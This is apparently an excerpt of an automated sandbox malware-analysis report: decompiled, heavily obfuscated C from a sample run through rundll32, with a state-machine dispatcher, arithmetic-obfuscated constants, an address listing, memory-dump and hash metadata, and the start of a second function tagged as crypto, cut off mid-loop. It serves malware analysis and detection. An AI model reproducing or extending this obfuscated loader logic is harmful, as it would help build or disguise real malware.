				_v1712 = _v1712 ^ 0x421b02cb;
				_v1712 = _v1712 * 0x57;
				_v1712 = _v1712 ^ 0xf24da14c;
				_v1620 = 0x85e70f;
				_v1620 = _v1620 >> 0xb;
				_v1620 = _v1620 ^ 0x000e59ba;
				_v1752 = 0xad6578;
				_v1752 = _v1752 * 0x5a;
				_v1752 = _v1752 << 0xc;
				_v1752 = _v1752 << 0x10;
				_v1752 = _v1752 ^ 0x00023595;
				_v1728 = 0x3989b2;
				_v1728 = _v1728 * 0x27;
				_v1728 = _v1728 * 0x4d;
				_v1728 = _v1728 << 4;
				_v1728 = _v1728 ^ 0x2f238c3a;
				_v1744 = 0x50e625;
				_v1744 = _v1744 ^ 0x2e9ac150;
				_v1744 = _v1744 >> 2;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 ^ 0x00596b64;
				_v1684 = 0x3fc833;
				_t557 = 0x76;
				_v1684 = _v1684 / _t557;
				_v1684 = _v1684 ^ 0xe050a76e;
				_v1684 = _v1684 ^ 0xe05ba95d;
				_v1576 = 0x904481;
				_v1576 = _v1576 | 0xbb34e4d7;
				_v1576 = _v1576 ^ 0xbbb7ee3e;
				_v1612 = 0xe49eb3;
				_v1612 = _v1612 + 0xfa7c;
				_v1612 = _v1612 ^ 0x00e777f0;
				_v1624 = 0x2dc9df;
				_v1624 = _v1624 ^ 0xfde67a02;
				_v1624 = _v1624 >> 4;
				_v1624 = _v1624 ^ 0x0fd7f95a;
				_v1688 = 0xb27c91;
				_v1688 = _v1688 + 0xcc48;
				_v1688 = _v1688 + 0xffff6aea;
				_v1688 = _v1688 ^ 0x00b739bb;
				_v1676 = 0x9962ec;
				_v1676 = _v1676 + 0xd2bc;
				_t627 = 0x59;
				_t558 = 0x22;
				_v1676 = _v1676 * 0x31;
				_v1676 = _v1676 ^ 0x1d838c0c;
				_v1720 = 0x20e7d3;
				_v1720 = _v1720 / _t627;
				_v1720 = _v1720 / _t558;
				_v1720 = _v1720 / _t627;
				_v1720 = _v1720 ^ 0x0002b2fc;
				_v1652 = 0xf809ca;
				_v1652 = _v1652 | 0xf7ee8eed;
				_v1652 = _v1652 << 1;
				_v1652 = _v1652 ^ 0xeff238d7;
				_v1580 = 0x7cb108;
				_v1580 = _v1580 + 0x41b4;
				_v1580 = _v1580 ^ 0x0076b4d3;
				_v1668 = 0xb3209d;
				_t559 = 0x53;
				_v1668 = _v1668 / _t559;
				_v1668 = _v1668 << 0xd;
				_v1668 = _v1668 ^ 0x450753ed;
				_v1604 = 0x53775b;
				_v1604 = _v1604 | 0x32a41867;
				_v1604 = _v1604 ^ 0x32fba052;
				_v1636 = 0xbc3265;
				_v1636 = _v1636 + 0xffff23eb;
				_v1636 = _v1636 ^ 0xe68a0726;
				_v1636 = _v1636 ^ 0xe63f3d4e;
				_v1756 = 0xe1916f;
				_v1756 = _v1756 + 0x6ec8;
				_v1756 = _v1756 | 0xf937d932;
				_v1756 = _v1756 + 0xfffffd3f;
				_v1756 = _v1756 ^ 0xf9f085ba;
				_v1588 = 0x69c4ca;
				_v1588 = _v1588 + 0xe8a1;
				_v1588 = _v1588 ^ 0x00630ca4;
				_v1584 = 0x6b201e;
				_v1584 = _v1584 | 0x74aee044;
				_v1584 = _v1584 ^ 0x74eba3bf;
				_v1760 = 0xf230ab;
				_v1760 = _v1760 >> 9;
				_v1760 = _v1760 >> 0xa;
				_v1760 = _v1760 >> 4;
				_v1760 = _v1760 ^ 0x00016a96;
				_v1704 = 0x98b305;
				_v1704 = _v1704 + 0x69fd;
				_v1704 = _v1704 ^ 0x979b8a6a;
				_v1704 = _v1704 + 0xffff998b;
				_v1704 = _v1704 ^ 0x9709d1d7;
				_v1736 = 0xce8702;
				_v1736 = _v1736 >> 0xa;
				_v1736 = _v1736 + 0x7a8b;
				_v1736 = _v1736 << 1;
				_v1736 = _v1736 ^ 0x000e6a30;
				_v1740 = 0x4c6a4b;
				_v1740 = _v1740 << 0xb;
				_v1740 = _v1740 | 0x0577b2ac;
				_v1740 = _v1740 + 0xffff4db5;
				_v1740 = _v1740 ^ 0x6775c844;
				_v1748 = 0x8b8c8;
				_t560 = 0x14;
				_v1748 = _v1748 / _t560;
				_t561 = 0x67;
				_v1748 = _v1748 / _t561;
				_t562 = 7;
				_v1748 = _v1748 * 0x36;
				_v1748 = _v1748 ^ 0x000fee79;
				_v1660 = 0xc3e5ac;
				_v1660 = _v1660 + 0xffffa1ff;
				_t563 = 0x46;
				_v1660 = _v1660 / _t562;
				_v1660 = _v1660 ^ 0x001e32d9;
				_v1664 = 0x1a636c;
				_v1664 = _v1664 | 0xf6dbfbcf;
				_v1664 = _v1664 ^ 0xf6df054d;
				_v1724 = 0xea18bc;
				_v1724 = _v1724 / _t563;
				_v1724 = _v1724 | 0x2d596700;
				_v1724 = _v1724 >> 1;
				_v1724 = _v1724 ^ 0x16a5f059;
				_v1672 = 0x567483;
				_v1672 = _v1672 >> 7;
				_v1672 = _v1672 + 0xffffe0a0;
				_v1672 = _v1672 ^ 0x000eacf4;
				_v1680 = 0x757070;
				_v1680 = _v1680 >> 0xd;
				_v1680 = _v1680 ^ 0xeacc73ee;
				_v1680 = _v1680 ^ 0xeac5b183;
				_v1648 = 0x45ab81;
				_v1648 = _v1648 >> 6;
				_v1648 = _v1648 + 0xffff50ab;
				_v1648 = _v1648 ^ 0x000d5f86;
				_v1708 = 0x462580;
				_t564 = 0xb;
				_t550 = _v1568;
				_v1708 = _v1708 / _t564;
				_t565 = 0x75;
				_v1708 = _v1708 / _t565;
				_t566 = 0x37;
				_v1708 = _v1708 * 0x50;
				_v1708 = _v1708 ^ 0x00078e43;
				_v1592 = 0x6b02b0;
				_v1592 = _v1592 + 0xffff70eb;
				_v1592 = _v1592 ^ 0x006caa59;
				_v1600 = 0x2f56d1;
				_v1600 = _v1600 ^ 0x1dd1a998;
				_v1600 = _v1600 ^ 0x1df0badb;
				_v1656 = 0xa683af;
				_v1656 = _v1656 / _t566;
				_v1656 = _v1656 << 1;
				_v1656 = _v1656 ^ 0x0003d06f;
				_v1608 = 0x6ef6d9;
				_v1608 = _v1608 + 0xd0f0;
				_v1608 = _v1608 ^ 0x006391fa;
				_v1700 = 0x90b08b;
				_v1700 = _v1700 + 0x4c46;
				_v1700 = _v1700 | 0x5cc03ba9;
				_t567 = 0x12;
				_v1700 = _v1700 / _t567;
				_v1700 = _v1700 ^ 0x052b7d82;
				_v1692 = 0x3d9f33;
				_v1692 = _v1692 + 0xffff6a07;
				_v1692 = _v1692 ^ 0xa1c8547f;
				_v1692 = _v1692 ^ 0xa1f3c56b;
				_v1632 = 0x96979b;
				_v1632 = _v1632 / _t627;
				_v1632 = _v1632 >> 0xa;
				_v1632 = _v1632 ^ 0x0009a5bf;
				_v1640 = 0x6f31a2;
				_v1640 = _v1640 ^ 0x3a2ad5a2;
				_v1640 = _v1640 ^ 0xeb2d3a23;
				_v1640 = _v1640 ^ 0xd16332d1;
				while(1) {
					L1:
					_t568 = 0x5c;
					while(1) {
						L2:
						_t526 = 0xdd30c3;
						do {
							L3:
							if(_t625 == _t526) {
								_t531 = E0035C2CE(_v1664, _v1648, _t550, _v1708, _v1592, _v1600, _v1716, _v1656, _v1564, _v1608,  &_v1560, 2 + E0035BA68(_v1664, _v1724, _v1672,  &_v1560, _v1680) * 2);
								_t631 =  &(_t631[0xd]);
								__eflags = _t531;
								_t625 = 0xd26443e;
								_t471 = _t531 == 0;
								__eflags = _t471;
								_v1568 = 0 | _t471;
								goto L17;
							} else {
								if(_t625 == 0x971d92c) {
									_push(_t568);
									E0034EA7B( &_v520, _v1696, _v1616, _t568, _v1572, _v1732, _v1628);
									_t631 =  &(_t631[7]);
									_t625 = 0xf5a31c5;
									goto L1;
								} else {
									if(_t625 == 0x9b520f4) {
										_t551 =  *0x36520c; // 0x0
										_t552 = _t551 + 0x220;
										while(1) {
											__eflags =  *_t552 - _t568;
											if(__eflags == 0) {
												break;
											}
											_t552 = _t552 + 2;
											__eflags = _t552;
										}
										_t550 = _t552 + 2;
										_t625 = 0xaa323c9;
										goto L2;
									} else {
										if(_t625 == 0xaa323c9) {
											_push(_v1636);
											_push(_v1604);
											_t572 = _v1580;
											_push(0x34118c);
											__eflags = E00348786(_v1756, _v1668, _v1580,  &_v1564, _v1588, E0034AB66(_v1580, _v1668, __eflags), _v1584, _v1760, _v1580, _t572, _v1704, _v1644, _v1596, _t572, _v1736);
											_t625 =  ==  ? 0xdd30c3 : 0x546d466;
											E0034AE03(_v1740, _v1748, _v1660, _t534);
											_t631 =  &(_t631[0x12]);
											L17:
											_t526 = 0xdd30c3;
											_t568 = 0x5c;
											goto L18;
										} else {
											if(_t625 == 0xd26443e) {
												E00347AF8(_v1700, _v1692, _v1564, _v1632, _v1640);
											} else {
												_t640 = _t625 - 0xf5a31c5;
												if(_t625 != 0xf5a31c5) {
													goto L18;
												} else {
													_push(_v1728);
													_push(_v1752);
													_push(0x3410fc);
													_t540 = E0034AB66(_v1712, _v1620, _t640);
													E0035C66E( &_v1040, _t640);
													_t544 =  *0x36520c; // 0x0
													_t546 =  *0x36520c; // 0x0
													_t427 =  &_v1684; // 0xe63f3d4e
													E0035BDB5( &_v1560, _t640, _v1744,  *_t427, _v1576, _v1612, _t546 + 0x220, _v1624, _v1688, _t544 + 8,  &_v1040,  &_v520, _t540);
													E0034AE03(_v1676, _v1720, _v1652, _t540);
													_t631 =  &(_t631[0x10]);
													_t625 = 0x9b520f4;
													while(1) {
														L1:
														_t568 = 0x5c;
														L2:
														_t526 = 0xdd30c3;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							L21:
							return _v1568;
							L18:
							__eflags = _t625 - 0x546d466;
						} while (__eflags != 0);
						goto L21;
					}
				}
			}



















































































                                                                                                                      0x0035d8d7
                                                                                                                      0x0035d8dd
                                                                                                                      0x0035d8ec
                                                                                                                      0x0035d900
                                                                                                                      0x0035d905
                                                                                                                      0x0035d90e
                                                                                                                      0x0035d919
                                                                                                                      0x0035d91e
                                                                                                                      0x0035d930
                                                                                                                      0x0035d935
                                                                                                                      0x0035d93e
                                                                                                                      0x0035d949
                                                                                                                      0x0035d95b
                                                                                                                      0x0035d960
                                                                                                                      0x0035d969
                                                                                                                      0x0035d974
                                                                                                                      0x0035d97f
                                                                                                                      0x0035d987
                                                                                                                      0x0035d98b
                                                                                                                      0x0035d98e
                                                                                                                      0x0035d992
                                                                                                                      0x0035d99a
                                                                                                                      0x0035d9a7
                                                                                                                      0x0035d9af
                                                                                                                      0x0035d9b7
                                                                                                                      0x0035d9bc
                                                                                                                      0x0035d9c4
                                                                                                                      0x0035d9cf
                                                                                                                      0x0035d9d7
                                                                                                                      0x0035d9e2
                                                                                                                      0x0035d9ef
                                                                                                                      0x0035d9f3
                                                                                                                      0x0035d9fb
                                                                                                                      0x0035da00
                                                                                                                      0x0035da08
                                                                                                                      0x0035da13
                                                                                                                      0x0035da26
                                                                                                                      0x0035da2d
                                                                                                                      0x0035da38
                                                                                                                      0x0035da40
                                                                                                                      0x0035da48
                                                                                                                      0x0035da55
                                                                                                                      0x0035da59
                                                                                                                      0x0035da61
                                                                                                                      0x0035da6c
                                                                                                                      0x0035da74
                                                                                                                      0x0035da7f
                                                                                                                      0x0035da8c
                                                                                                                      0x0035da90
                                                                                                                      0x0035da95
                                                                                                                      0x0035da9a
                                                                                                                      0x0035daa2
                                                                                                                      0x0035daaf
                                                                                                                      0x0035dab8
                                                                                                                      0x0035dabc
                                                                                                                      0x0035dac3
                                                                                                                      0x0035dacb
                                                                                                                      0x0035dad3
                                                                                                                      0x0035dadb
                                                                                                                      0x0035dae0
                                                                                                                      0x0035dae5
                                                                                                                      0x0035daed
                                                                                                                      0x0035dafb
                                                                                                                      0x0035db00
                                                                                                                      0x0035db04
                                                                                                                      0x0035db0c
                                                                                                                      0x0035db14
                                                                                                                      0x0035db1f
                                                                                                                      0x0035db2a
                                                                                                                      0x0035db35
                                                                                                                      0x0035db40
                                                                                                                      0x0035db4b
                                                                                                                      0x0035db56
                                                                                                                      0x0035db61
                                                                                                                      0x0035db6c
                                                                                                                      0x0035db74
                                                                                                                      0x0035db7f
                                                                                                                      0x0035db87
                                                                                                                      0x0035db8f
                                                                                                                      0x0035db97
                                                                                                                      0x0035db9f
                                                                                                                      0x0035dba7
                                                                                                                      0x0035dbb6
                                                                                                                      0x0035dbb9
                                                                                                                      0x0035dbba
                                                                                                                      0x0035dbbe
                                                                                                                      0x0035dbc6
                                                                                                                      0x0035dbd6
                                                                                                                      0x0035dbe2
                                                                                                                      0x0035dbee
                                                                                                                      0x0035dbf4
                                                                                                                      0x0035dbfc
                                                                                                                      0x0035dc07
                                                                                                                      0x0035dc12
                                                                                                                      0x0035dc19
                                                                                                                      0x0035dc24
                                                                                                                      0x0035dc2f
                                                                                                                      0x0035dc3a
                                                                                                                      0x0035dc45
                                                                                                                      0x0035dc51
                                                                                                                      0x0035dc54
                                                                                                                      0x0035dc58
                                                                                                                      0x0035dc5d
                                                                                                                      0x0035dc65
                                                                                                                      0x0035dc70
                                                                                                                      0x0035dc7b
                                                                                                                      0x0035dc86
                                                                                                                      0x0035dc91
                                                                                                                      0x0035dc9c
                                                                                                                      0x0035dca7
                                                                                                                      0x0035dcb2
                                                                                                                      0x0035dcba
                                                                                                                      0x0035dcc2
                                                                                                                      0x0035dcca
                                                                                                                      0x0035dcd2
                                                                                                                      0x0035dcda
                                                                                                                      0x0035dce7
                                                                                                                      0x0035dcf2
                                                                                                                      0x0035dcfd
                                                                                                                      0x0035dd08
                                                                                                                      0x0035dd13
                                                                                                                      0x0035dd1e
                                                                                                                      0x0035dd26
                                                                                                                      0x0035dd2b
                                                                                                                      0x0035dd30
                                                                                                                      0x0035dd35
                                                                                                                      0x0035dd3d
                                                                                                                      0x0035dd45
                                                                                                                      0x0035dd4d
                                                                                                                      0x0035dd55
                                                                                                                      0x0035dd5d
                                                                                                                      0x0035dd65
                                                                                                                      0x0035dd6d
                                                                                                                      0x0035dd72
                                                                                                                      0x0035dd7a
                                                                                                                      0x0035dd7e
                                                                                                                      0x0035dd86
                                                                                                                      0x0035dd8e
                                                                                                                      0x0035dd93
                                                                                                                      0x0035dd9b
                                                                                                                      0x0035dda3
                                                                                                                      0x0035ddab
                                                                                                                      0x0035ddb9
                                                                                                                      0x0035ddbe
                                                                                                                      0x0035ddc8
                                                                                                                      0x0035ddcd
                                                                                                                      0x0035ddd8
                                                                                                                      0x0035dddb
                                                                                                                      0x0035dddf
                                                                                                                      0x0035dde7
                                                                                                                      0x0035ddef
                                                                                                                      0x0035ddfd
                                                                                                                      0x0035ddfe
                                                                                                                      0x0035de04
                                                                                                                      0x0035de0c
                                                                                                                      0x0035de14
                                                                                                                      0x0035de1c
                                                                                                                      0x0035de24
                                                                                                                      0x0035de34
                                                                                                                      0x0035de38
                                                                                                                      0x0035de40
                                                                                                                      0x0035de44
                                                                                                                      0x0035de4c
                                                                                                                      0x0035de54
                                                                                                                      0x0035de59
                                                                                                                      0x0035de61
                                                                                                                      0x0035de69
                                                                                                                      0x0035de71
                                                                                                                      0x0035de76
                                                                                                                      0x0035de7e
                                                                                                                      0x0035de86
                                                                                                                      0x0035de91
                                                                                                                      0x0035de99
                                                                                                                      0x0035dea4
                                                                                                                      0x0035deb1
                                                                                                                      0x0035debd
                                                                                                                      0x0035dec2
                                                                                                                      0x0035dec9
                                                                                                                      0x0035ded8
                                                                                                                      0x0035dedd
                                                                                                                      0x0035dee8
                                                                                                                      0x0035deeb
                                                                                                                      0x0035deef
                                                                                                                      0x0035def7
                                                                                                                      0x0035df02
                                                                                                                      0x0035df0d
                                                                                                                      0x0035df18
                                                                                                                      0x0035df23
                                                                                                                      0x0035df2e
                                                                                                                      0x0035df39
                                                                                                                      0x0035df49
                                                                                                                      0x0035df4d
                                                                                                                      0x0035df51
                                                                                                                      0x0035df59
                                                                                                                      0x0035df64
                                                                                                                      0x0035df6f
                                                                                                                      0x0035df7a
                                                                                                                      0x0035df82
                                                                                                                      0x0035df8a
                                                                                                                      0x0035df96
                                                                                                                      0x0035df9b
                                                                                                                      0x0035df9f
                                                                                                                      0x0035dfa7
                                                                                                                      0x0035dfaf
                                                                                                                      0x0035dfb7
                                                                                                                      0x0035dfbf
                                                                                                                      0x0035dfc7
                                                                                                                      0x0035dfdb
                                                                                                                      0x0035dfe2
                                                                                                                      0x0035dfea
                                                                                                                      0x0035dff5
                                                                                                                      0x0035e000
                                                                                                                      0x0035e00b
                                                                                                                      0x0035e016
                                                                                                                      0x0035e021
                                                                                                                      0x0035e021
                                                                                                                      0x0035e023
                                                                                                                      0x0035e024
                                                                                                                      0x0035e024
                                                                                                                      0x0035e024
                                                                                                                      0x0035e029
                                                                                                                      0x0035e029
                                                                                                                      0x0035e02b
                                                                                                                      0x0035e25d
                                                                                                                      0x0035e264
                                                                                                                      0x0035e267
                                                                                                                      0x0035e269
                                                                                                                      0x0035e26e
                                                                                                                      0x0035e26e
                                                                                                                      0x0035e271
                                                                                                                      0x00000000
                                                                                                                      0x0035e031
                                                                                                                      0x0035e037
                                                                                                                      0x0035e1c5
                                                                                                                      0x0035e1eb
                                                                                                                      0x0035e1f0
                                                                                                                      0x0035e1f3
                                                                                                                      0x00000000
                                                                                                                      0x0035e03d
                                                                                                                      0x0035e043
                                                                                                                      0x0035e1a5
                                                                                                                      0x0035e1ab
                                                                                                                      0x0035e1b6
                                                                                                                      0x0035e1b6
                                                                                                                      0x0035e1b9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035e1b3
                                                                                                                      0x0035e1b3
                                                                                                                      0x0035e1b3
                                                                                                                      0x0035e1bb
                                                                                                                      0x0035e1be
                                                                                                                      0x00000000
                                                                                                                      0x0035e049
                                                                                                                      0x0035e04b
                                                                                                                      0x0035e113
                                                                                                                      0x0035e11a
                                                                                                                      0x0035e125
                                                                                                                      0x0035e12c
                                                                                                                      0x0035e179
                                                                                                                      0x0035e195
                                                                                                                      0x0035e198
                                                                                                                      0x0035e19d
                                                                                                                      0x0035e278
                                                                                                                      0x0035e27a
                                                                                                                      0x0035e27f
                                                                                                                      0x00000000
                                                                                                                      0x0035e051
                                                                                                                      0x0035e057
                                                                                                                      0x0035e2ab
                                                                                                                      0x0035e05d
                                                                                                                      0x0035e05d
                                                                                                                      0x0035e063
                                                                                                                      0x00000000
                                                                                                                      0x0035e069
                                                                                                                      0x0035e069
                                                                                                                      0x0035e06d
                                                                                                                      0x0035e07c
                                                                                                                      0x0035e081
                                                                                                                      0x0035e08f
                                                                                                                      0x0035e0aa
                                                                                                                      0x0035e0c5
                                                                                                                      0x0035e0de
                                                                                                                      0x0035e0e9
                                                                                                                      0x0035e101
                                                                                                                      0x0035e106
                                                                                                                      0x0035e109
                                                                                                                      0x0035e021
                                                                                                                      0x0035e021
                                                                                                                      0x0035e023
                                                                                                                      0x0035e024
                                                                                                                      0x0035e024
                                                                                                                      0x00000000
                                                                                                                      0x0035e024
                                                                                                                      0x0035e021
                                                                                                                      0x0035e063
                                                                                                                      0x0035e057
                                                                                                                      0x0035e04b
                                                                                                                      0x0035e043
                                                                                                                      0x0035e037
                                                                                                                      0x0035e2b3
                                                                                                                      0x0035e2c4
                                                                                                                      0x0035e280
                                                                                                                      0x0035e280
                                                                                                                      0x0035e280
                                                                                                                      0x00000000
                                                                                                                      0x0035e28c
                                                                                                                      0x0035e024

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #:-$'$>D&$>D&$FL$JRP$KjL$N=?$YU$[wS$dkY$ppu
                                                                                                                      • API String ID: 0-3845620242
                                                                                                                      • Opcode ID: 179cd683cd981327faa06b0bf86d69e923bfbc10a4c3a55d52758d3be4db60cc
                                                                                                                      • Instruction ID: 279acca920b0d66c0a68525a0ddaa86640aab7949acdbc7629ebf3ee56e2e602
                                                                                                                      • Opcode Fuzzy Hash: 179cd683cd981327faa06b0bf86d69e923bfbc10a4c3a55d52758d3be4db60cc
                                                                                                                      • Instruction Fuzzy Hash: F332F272508380DFD369CF65C94AA8FBBE2FBC4718F10891DE19986260D7B59949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035EE94 Relevance: 14.2, Strings: 11, Instructions: 427COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0035EE94(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				intOrPtr _t445;
				void* _t448;
				intOrPtr _t453;
				signed int _t467;
				intOrPtr _t470;
				intOrPtr _t471;
				void* _t505;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				intOrPtr* _t521;
				signed int _t524;
				intOrPtr _t529;
				signed int* _t531;
				void* _t533;

				_t471 = __ecx;
				_push(_a8);
				_v104 = __ecx;
				_push(_a4);
				_v12 = __edx;
				_push(__edx);
				_push(__ecx);
				E0034CF25(__edx);
				_v124 = 0x410507;
				_t531 =  &(( &_v192)[4]);
				_v124 = _v124 ^ 0x83a2264d;
				_v124 = _v124 >> 0xa;
				_t470 = 0;
				_t529 = 0;
				_t512 = 0x17;
				_t524 = 0xd582a45;
				_v124 = _v124 * 3;
				_v124 = _v124 ^ 0x0062ea59;
				_v164 = 0x8ee5f4;
				_v164 = _v164 << 0xd;
				_v164 = _v164 ^ 0xc2bd4067;
				_v164 = _v164 + 0xffffa455;
				_v164 = _v164 ^ 0x1e0364bd;
				_v116 = 0xd0c3db;
				_v116 = _v116 + 0x7244;
				_v116 = _v116 + 0xffff5950;
				_v116 = _v116 * 0x7d;
				_v116 = _v116 ^ 0x65d60932;
				_v76 = 0x69c3d0;
				_v76 = _v76 + 0x2803;
				_v76 = _v76 ^ 0x0109b4af;
				_v76 = _v76 ^ 0x016cb6ed;
				_v84 = 0x591f9b;
				_v84 = _v84 ^ 0x136c22a2;
				_v84 = _v84 + 0xbc03;
				_v84 = _v84 ^ 0x133eabdb;
				_v40 = 0x32843;
				_v40 = _v40 + 0x6836;
				_v40 = _v40 ^ 0x000a5f7a;
				_v96 = 0x3c9c05;
				_v96 = _v96 * 0x1a;
				_v96 = _v96 ^ 0xb1c6e809;
				_v96 = _v96 ^ 0xb7e34fe8;
				_v56 = 0xda9312;
				_v56 = _v56 / _t512;
				_v56 = _v56 ^ 0x0000b271;
				_v132 = 0xda0ea8;
				_v132 = _v132 | 0xaeef9bf7;
				_t513 = 0x71;
				_v132 = _v132 / _t513;
				_v132 = _v132 ^ 0x01890540;
				_v44 = 0x61f218;
				_v44 = _v44 + 0xffff41d7;
				_v44 = _v44 ^ 0x006fe265;
				_v144 = 0x306d33;
				_v144 = _v144 + 0xfffff564;
				_v144 = _v144 * 0x6e;
				_v144 = _v144 + 0xffff469c;
				_v144 = _v144 ^ 0x14c9b51d;
				_v52 = 0x70de34;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x038f9e4d;
				_v36 = 0x6cb1ac;
				_v36 = _v36 + 0x1a54;
				_v36 = _v36 ^ 0x00646b3f;
				_v152 = 0x976d54;
				_v152 = _v152 ^ 0x53b4556c;
				_v152 = _v152 ^ 0x5116bac9;
				_v152 = _v152 ^ 0x4d195c93;
				_v152 = _v152 ^ 0x4f27d4c2;
				_v28 = 0x414a88;
				_v28 = _v28 | 0x717fc69d;
				_v28 = _v28 ^ 0x71799fc5;
				_v160 = 0xc7706;
				_v160 = _v160 + 0xc91f;
				_v160 = _v160 | 0xaa894ceb;
				_v160 = _v160 + 0xffffb57b;
				_v160 = _v160 ^ 0xaa88db85;
				_v168 = 0x67f23c;
				_v168 = _v168 ^ 0x8eced2dd;
				_v168 = _v168 ^ 0x27c733d3;
				_v168 = _v168 ^ 0x736125b9;
				_v168 = _v168 ^ 0xda0ef7f2;
				_v176 = 0x85bb3;
				_v176 = _v176 | 0x89ba1603;
				_v176 = _v176 >> 8;
				_t514 = 0x6a;
				_v176 = _v176 / _t514;
				_v176 = _v176 ^ 0x0009ce33;
				_v136 = 0xb0a921;
				_v136 = _v136 ^ 0x2367151f;
				_v136 = _v136 ^ 0x64865221;
				_t515 = 0x35;
				_v136 = _v136 * 0x3f;
				_v136 = _v136 ^ 0x8d2b953d;
				_v148 = 0x2df722;
				_v148 = _v148 * 0x30;
				_v148 = _v148 + 0xd30d;
				_v148 = _v148 | 0x68c8f2ae;
				_v148 = _v148 ^ 0x68db5c3d;
				_v92 = 0xa4f97a;
				_v92 = _v92 ^ 0x325a0e28;
				_v92 = _v92 + 0x57de;
				_v92 = _v92 ^ 0x32f51d21;
				_v32 = 0xa83f00;
				_v32 = _v32 + 0xffff47e2;
				_v32 = _v32 ^ 0x00a2bde7;
				_v156 = 0xe5ea35;
				_t178 =  &_v156; // 0xe5ea35
				_v156 =  *_t178 / _t515;
				_v156 = _v156 << 5;
				_v156 = _v156 + 0x3621;
				_v156 = _v156 ^ 0x008c998d;
				_v180 = 0x37bb8c;
				_v180 = _v180 ^ 0x8c6790c9;
				_t516 = 0x3c;
				_v180 = _v180 * 0x44;
				_v180 = _v180 | 0x3ef8ecb7;
				_v180 = _v180 ^ 0x7ff3e314;
				_v88 = 0x10d686;
				_v88 = _v88 + 0xffff44b6;
				_v88 = _v88 / _t516;
				_v88 = _v88 ^ 0x000573bd;
				_v64 = 0x2cf4a8;
				_v64 = _v64 << 0xb;
				_v64 = _v64 + 0xffff4c9b;
				_v64 = _v64 ^ 0x67a6f27b;
				_v188 = 0x434d7c;
				_t218 =  &_v188; // 0x434d7c
				_v188 =  *_t218 * 0x14;
				_v188 = _v188 + 0xffff53dc;
				_v188 = _v188 * 0x58;
				_v188 = _v188 ^ 0xce78d82e;
				_v48 = 0x39a498;
				_v48 = _v48 + 0xd90b;
				_v48 = _v48 ^ 0x00328937;
				_v172 = 0x329194;
				_v172 = _v172 + 0x15c2;
				_v172 = _v172 ^ 0x8846dc1f;
				_v172 = _v172 + 0x561;
				_v172 = _v172 ^ 0x8878b13b;
				_v140 = 0x921bc4;
				_v140 = _v140 | 0xc689e64a;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 ^ 0x67a6be9d;
				_v140 = _v140 ^ 0x67a0761b;
				_v72 = 0xa3a418;
				_t517 = 0x26;
				_v72 = _v72 * 0x26;
				_v72 = _v72 >> 0x10;
				_v72 = _v72 ^ 0x0002c06b;
				_v108 = 0xd1ae1a;
				_v108 = _v108 ^ 0x567f87f9;
				_v108 = _v108 | 0x0eb5e220;
				_v108 = _v108 ^ 0x558f672f;
				_v108 = _v108 ^ 0x0b3c3f9a;
				_v80 = 0x5d29a8;
				_v80 = _v80 | 0x5a2f4123;
				_v80 = _v80 / _t517;
				_v80 = _v80 ^ 0x0265326d;
				_v184 = 0x50dc21;
				_v184 = _v184 + 0xffff863b;
				_v184 = _v184 + 0xffff7ebb;
				_v184 = _v184 + 0x5f54;
				_v184 = _v184 ^ 0x005a5f37;
				_v68 = 0x13fcd3;
				_v68 = _v68 + 0x7ca8;
				_v68 = _v68 >> 3;
				_v68 = _v68 ^ 0x000ac947;
				_v24 = 0xc2d10f;
				_v24 = _v24 + 0xffff657d;
				_v24 = _v24 ^ 0x00c52471;
				_v192 = 0x48c156;
				_v192 = _v192 >> 4;
				_t518 = 0x2f;
				_v192 = _v192 * 0x2f;
				_v192 = _v192 + 0xffffa98f;
				_v192 = _v192 ^ 0x00d9c1bc;
				_v112 = 0xb16c9;
				_v112 = _v112 >> 0xe;
				_v112 = _v112 << 0x10;
				_v112 = _v112 / _t518;
				_v112 = _v112 ^ 0x00028b59;
				_v120 = 0x2563ad;
				_t519 = 0x30;
				_v120 = _v120 / _t519;
				_v120 = _v120 + 0xffffe9b6;
				_v120 = _v120 >> 8;
				_v120 = _v120 ^ 0x000e86e4;
				_v60 = 0x629492;
				_t520 = 0x32;
				_v60 = _v60 / _t520;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0x07e42de9;
				_v128 = 0x197221;
				_v128 = _v128 >> 0xf;
				_v128 = _v128 << 1;
				_v128 = _v128 * 0x2e;
				_v128 = _v128 ^ 0x0004057d;
				_t521 = _v16;
				while(1) {
					L1:
					goto L2;
					do {
